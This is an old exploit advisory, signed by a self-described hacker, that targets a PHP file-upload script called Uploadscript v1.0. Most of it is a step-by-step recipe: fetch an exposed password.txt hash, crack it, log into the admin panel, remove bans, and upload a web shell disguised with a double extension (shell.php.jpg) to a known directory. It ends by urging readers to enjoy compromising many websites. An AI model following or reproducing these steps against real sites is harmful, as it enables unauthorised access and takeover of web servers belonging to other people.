# Exploit Title: Uploadscript v1.0. Multiple Vulnerabilities # Date: 13-12-2009 # Author: Mr.aFiR # Software Link: http://www.phpstudio.hu/?action=verify&categorize=php&subaction=php&context=php&ID=75&verify=0 # Version: N/A # Tested on: GNU/LINUX # CVE : N/A # Code : N/A ##################################################################### ##################################################################### ## _______ ____ ## ## __ ___ / _____ \ / __ \ ## ## / \ _ _ ___ | |___ |/ | | ) ) ## ## | Y Y \| V_\ / _ Y| __ |(_)| |_/ / [A] ## ## |__|__|__ \ | ()| (_] | | \|| || __ \ ## ## \/_/ \___ | | | || | ) | ## ## \|/ |_/|_/ |/ ## ## ## ##################################################################### ## Uploadscript v1.0. Multiple Vulnerabilities ## ## [Admin-password / Shell Upload] ## ## Created By Mr.aFiR (Moroccan Hacker) ## ## Email: q-_@hotmail.com / ax@hotmail.com ## ## Website: www.aFiR.me ## ## (c) -- 13/12/2oo9 ## ##################################################################### ## * How to use it ? ## ## ----------------- ## ## ~ Go to : > http://site/path/password.txt ## ## > You will find a Hash(md5) password ! ## ## > Decrypte this password ! ## ## > Now! Go to : /path/admin.php ## ## > Write the password & Login to AdminCP ## ## > Go to : /path/admin.php?act=bans ## ## > Delete All Bans ## ## > Now! Go to : /path/index.php ## ## > Upload your shell as : shell.php.jpg ## ## > Uploaded Files Directory is : /path/storagedata/ ## ## > Your Link is: ## ## http://server/path/storagedata/[Shell] ## ## > ------------------------------------------------- ## ## > Enjoy With it, You Will Find a lot of infected ## ## websites. & Remember me ;) ## ##################################################################### ## ~ GreatZ To : > Dr.Crypter - Dr.BoB-Hacker - Love511 & All ... ## ## ~ Contact : > q-_[at]Hotmail[dot]com - www[dot]aFiR[dot]me ## ## I Love You **** ## #####################################################################